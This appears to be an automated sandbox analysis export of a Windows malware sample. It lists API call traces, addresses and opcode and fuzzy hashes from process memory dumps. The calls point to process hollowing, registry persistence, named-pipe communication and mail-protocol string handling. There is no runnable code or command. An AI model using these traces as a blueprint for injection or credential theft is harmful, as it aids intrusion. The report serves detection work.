  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
